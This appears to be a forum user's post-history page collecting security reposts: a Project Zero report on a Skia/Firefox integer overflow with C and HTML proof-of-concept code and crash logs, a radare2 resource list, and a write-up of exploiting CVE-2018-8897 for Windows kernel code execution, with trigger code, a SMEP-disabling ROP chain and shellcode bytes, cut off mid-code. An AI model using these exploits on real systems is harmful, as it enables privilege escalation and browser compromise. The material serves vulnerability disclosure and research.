Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. Mobile Security Updates: Understanding the Issues A Commission Report February 2018 FEDERAL TRADE COMMISSION Maureen K. Ohlhausen, Acting Chairman Terrell McSweeny, Commissioner Download: https://www.ftc.gov/system/files/documents/reports/mobile-security-updates-understanding-issues/mobile_security_updates_understanding_the_issues_publication_final.pdf
  2. Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write Project Member Reported by ifratric@google.com, Feb 28 Back to list Issue description Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674 Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941 In Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur: (1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369 (2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382 (3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383 and possibly others In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as fReserve * sizeof(T) sizeof(T) * count etc. are used. An integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element. I have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths. The PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows. PoC program for Skia ================================================================= #include <stdio.h> #include "SkCanvas.h" #include "SkPath.h" #include "SkGradientShader.h" #include "SkBitmap.h" #include "SkDashPathEffect.h" int main (int argc, char * const argv[]) { SkBitmap bitmap; bitmap.allocN32Pixels(500, 500); //Create Canvas SkCanvas canvas(bitmap); SkPaint p; p.setAntiAlias(false); float intervals[] = { 0, 10e9f }; p.setStyle(SkPaint::kStroke_Style); p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0)); SkPath path; unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0}; path.moveTo(0, 0); unsigned numpoints = 1; unsigned i = 1; unsigned qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { path.quadTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { path.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { path.moveTo(0, 0); numpoints += 1; i = 1; } } printf("done building path\n"); canvas.drawPath(path, p); return 0; } ================================================================= ASan output: ASAN:DEADLYSIGNAL ================================================================= ==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0) #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65) #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c) #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17 #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21 #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9 #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688 #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14 #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12 #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24 #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18 #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9 #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226 #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9 #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5 #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5 #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519) The issue can also be triggered via the web in Mozilla Firefox PoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer) ================================================================= <canvas id="canvas" width="64" height="64"></canvas> <br> <button onclick="go()">go</button> <script> var canvas = document.getElementById("canvas"); var ctx = canvas.getContext("2d"); function go() { ctx.beginPath(); ctx.mozImageSmoothingEnabled = false; ctx.webkitImageSmoothingEnabled = false; ctx.msImageSmoothingEnabled = false; ctx.imageSmoothingEnabled = false; linedasharr = [0, 1e+37]; ctx.setLineDash(linedasharr); quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613]; ctx.moveTo(0, 0); numpoints = 1; i = 1; qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { ctx.quadraticCurveTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { ctx.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { ctx.moveTo(0, 0); numpoints += 1; i = 1; } } alert("done building path"); ctx.stroke(); alert("exploit failed"); } </script> ================================================================= ASan output: AddressSanitizer:DEADLYSIGNAL ================================================================= ==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0) ==37732==The signal is caused by a WRITE memory access. #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17 #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342 #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15 #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688 #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19 #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12 #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37 #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25 #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15 #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235 #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23 #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12 #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11 #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13 #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13 #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15 #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467 #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14 #18 0x1a432b56061a (<unknown module>) This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1541
  3. Awesome Radare2 A curated list of awesome projects, articles and the other materials powered by Radare2. What is Radare2? Radare is a portable reversing framework that can... Disassemble (and assemble for) many different architectures Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...) Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku Perform forensics on filesystems and data carving Be scripted in Python, Javascript, Go and more Visualize data structures of several file types Patch programs to uncover new features or fix vulnerabilities Use powerful analysis capabilities to speed up reversing Aid in software exploitation More info here. Table of Contents Books Videos Recordings Asciinemas Conferences Slides Tutorials and Blogs Tools Scripts Contributing Awesome Radare2 Materials Books R2 "Book" Radare2 Explorations Radare2 wiki Videos Recordings Creating a keygen for FrogSek KGM#1 - by @binaryheadache Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007 Introduction To Reverse Engineering With Radare2 Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2 Asciinemas metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL Filter for string's searching (urls, emails) Manual unpacking UPX on linux 64-bit Conferences r2con 2017 LinuxDays 2017 - Disassembling with radare2 SUE 2017 - Reverse Engineering Embedded ARM Devices radare demystified (33c3) r2con 2016 Reversing with Radare2 - OverDrive Conference Radare2 & frida hack-a-ton 2015 Radare from A to Z 2015 Reverse engineering embedded software using Radare2 - Linux.conf.au 2015 OggCamp - Shellcode - vext01 Slides and Workshops Radare2 cheat-sheet r2m2 - radare2 + miasm2 = ♥ Radare2 Workshop 2015 (Defcon) Emulating Code In Radare2 Radare from A to Z 2015 Radare2 Workshop 2015 (Hack.lu) Radare2 & frida hack-a-ton 2015 radare2: evolution radare2: from forensics to bindiffing Tutorials and Blogs Linux Malware by @MalwareMustDie Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn Reverse engineering a Gameboy ROM with radare2 - by @megabeets_ radare2 as an alternative to gdb-peda How to find offsets for v0rtex (by Siguza) Debugging a Forking Server with r2 Defeating IOLI with radare2 in 2017 Using r2 to analyse Minidumps Android malware analysis with Radare: Dissecting the Triada Trojan Solving game2 from the badge of Black Alps 2017 with radare2 ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2 ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2 Reversing EVM bytecode with radare2 Radare2’s Visual Mode Crackme0x03 Dissected with Radare2 Crackme0x02 Dissected with Radare2 Crackme0x01 Dissected with Radare2 Debugging Using Radare2… and Windows! - by @jacob16682 Decrypting APT33’s Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_ A journey into Radare 2 – Part 2: Exploitation - by @megabeets_ A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_ Reverse Engineering With Radare2 - by @insinuator Write-ups from RHME3 pre-qualifications at RADARE2 conference Hackover CTF 2016 - tiny_backdoor writeup radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object Reversing and Exploiting Embedded Devices: The Software Stack (Part 1) Binary Bomb with Radare2 - by @binaryheadache crackserial_linux with radare2 - by @binaryheadache Examining malware with r2 - by @binaryheadache Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx Radare2 of the Lost Magic Gadget - by @0xabe_io Radare 2 in 0x1E minutes - by @superkojiman Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2 Baleful was a challenge relased in picoctf At Gunpoint Hacklu 2014 With Radare2 - by @crowell Pwning With Radare2 - by @crowell Solving ‘heap’ from defcon 2014 qualifier with r2 - by @alvaro_fe How to radare2 a fake openssh exploit - by jvoisin Disassembling 6502 code with Radare – Part I - by @ricardoquesada Disassembling 6502 code with Radare – Part II - by @ricardoquesada Unpacking shikata-ga-nai by scripting radare2 This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2 Raspberry PI hang instruction - by @pancake Solving avatao's "R3v3rs3 4" - by @sghctoma Reverse Engineering With Radare2, Part 1 - by @sam_symons Simple crackme with Radare2 - by @futex90 Pwning With Radare2 - by @crowell Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie ROPping to Victory ROPping to Victory - Part 2, split Tools Docker image encapsulates the reverse-engineering framework Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing rarop - graphical ROP chain builder using radare2 and r2pipe Radare2 and Frida better together Android APK analyzer based on radare2 Scripts helper radare2 script to analyze UEFI firmware modules ThinkPwn Scanner - by @d_olex and @trufae radare2-lldb integration create a YARA signature for the bytes of the current function A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr) Just a simple radare2 Jupyter kernel r2scapy - a radare2 plugin that decodes packets with Scapy A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table radare2 plugin - converts asm to pseudo-C code (experimental) A python script using radare2 for decrypt and patch the strings of GootKit malware Collection of scripts for radare2 for MIPS arch Extract functions and opcodes with radare2 - by @andrewaeva r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads Patch kextd using radare2 Python-r2pipe script that draws ascii and graphviz graphs of library dependencies Simple XOR DDOS strings deobfuscator - by @NighterMan Decode multiple shellcodes encoded with msfencode - by @NighterMan Baleful CTF task plugins Contributing Please refer the guidelines at contributing.md for details. Sursa: https://github.com/dukebarman/awesome-radare2
      • 1
      • Thanks
  4. Nu stiu cum e pe telefon, dar la Activity iti poti seta cum sa arate feed-ul personalizat.
  5. Si eu postez la fel uneori. Ideea e ca acele posturi sunt utile. Printre posturile lui @OKQL am gasit lucruri despre care nu stiam, si in general sunt la curent cum cam tot ce apare.
  6. 1. http://jsbeautifier.org/ 2. Inlocuiesti eval cu alert (de exemplu) 3. http://jsbeautifier.org/ 4. Ai din nou eval Nu am timp de mai mult momentan.
  7. Arbitrary Code Execution at Ring 0 using CVE-2018-8897 Can BölükMay 11, 201801017.9k Just a few days ago, a new vulnerability allowing an unprivileged user to run #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post. Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation. Final source code can be found at the bottom. 0x0: Setting Up the Basics The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode. We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted. All of this can be done in a few lines like shown below: #include <Windows.h> #include <iostream> void main() { static DWORD g_SavedSS = 0; _asm { mov ax, ss mov word ptr [ g_SavedSS ], ax } CONTEXT Ctx = { 0 }; Ctx.Dr0 = ( DWORD ) &g_SavedSS; Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ); Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; SetThreadContext( HANDLE( -2 ), &Ctx ); PVOID FakeGsBase = ...; _asm { mov eax, FakeGsBase ; Set eax to fake gs base push 0x23 push X64_End push 0x33 push X64_Start retf X64_Start: __emit 0xf3 ; wrgsbase eax __emit 0x0f __emit 0xae __emit 0xd8 retf X64_End: ; Vulnerability mov ss, word ptr [ g_SavedSS ] ; Defer debug exception int 3 ; Execute with interrupts disabled nop } } This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit. Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx. We can utilize a small IDA script to step to relevant parts faster: #include <idc.idc> static main() { Message( "--- Step Till Next GS ---\n" ); while( 1 ) { auto Disasm = GetDisasmEx( GetEventEa(), 1 ); if ( strstr( Disasm, "gs:" ) >= Disasm ) break; StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); } } 0x1: Fixing the KPCR Data Here are the few cases we have to modify GSBASE contents to pass through successfully: – KiDebugTrapOrFault KiDebugTrapOrFault: ... MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80. – KiExceptionDispatch KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8 Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h. – KiDispatchException KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h] This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it. KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h] 0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it. – RtlDispatchException This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do? There’s a weird check in the middle of the function: char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; } Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException. – KeBugCheckEx We are finally here. Here’s the last thing we need to fix: MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now. 0x2: and Write|What|Where And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time. I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit: #include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } } To my disappointment, there is no convenient jumps or calls. The whole output is: - KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it. I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses: NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit). However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made. .text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... .text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4. To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it. Thread logic will be like the following: volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode. The final chain will look something like: -- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010) In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below: NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* 